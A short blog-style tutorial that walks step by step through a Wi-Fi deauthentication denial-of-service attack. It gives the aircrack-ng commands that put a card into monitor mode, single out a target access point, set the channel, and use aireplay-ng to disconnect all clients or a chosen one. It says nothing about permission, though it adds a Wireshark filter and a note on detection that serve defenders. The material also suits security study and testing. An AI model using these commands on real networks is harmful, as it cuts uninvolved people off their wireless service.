Deauthentication Attack

This Denial of Service attack is against the connected clients of a wireless network. The idea is to send deauthentication frames on behalf of the Access Point to the clients. When a connected client receives this type of wireless frame is obligated to disconnect immediately from the network.

Steps:

Create a monitoring interface with the following command:

airmon-ng start INTERFACE

I’ll use Airodump-ng in order to identify the target network, but there are a number of tools out there for this job.

airodump-ng MONITOR_INTERFACE

Usually, you are presented with a huge amount access points. You can simply narrow down the list to only show that specific AP.

airodump-ng —-bssid AP_MAC_ADDRESS MONITOR_INTERFACE

It’s a good practice to put the WNIC (Wireless Network Interface Controller) to the same channel as with the target AP.

ifconfig INTERFACE down
iwconfig INTERFACE channel CHANNEL
ifconfig INTERFACE up

You can capture deauthentication frames being sent in Wireshark with this filter:

wlan.fc.type_subtype == 0x0c

In this step, I launch the aireplay-ng tool to transmit deauthentication frames on behalf of the AP to all the clients.

aireplay-ng -0 10 -a AP_MAC_ADDRESS MONITOR_INTERFACE

The “-0 10” specifies that this is a deauthentication attack and 10 is the number of frames, which you can freely change. You can also disconnect a specific client with the help of the -c CLIENT_MAC_ADDRESS switch.

Final words

Wireless Denial of Service attack is an active attack meaning that we are transmitting malicious frames that can be detected by an intrusion detection system or by sniffing traffic with Wireshark.

Before you go

Thank you for taking the time to read my article. If you found it helpful, please hit the 👏 button 👏 (up to 50x) and share it to help others with similar interest find it! + Feedback is always welcome! 🙏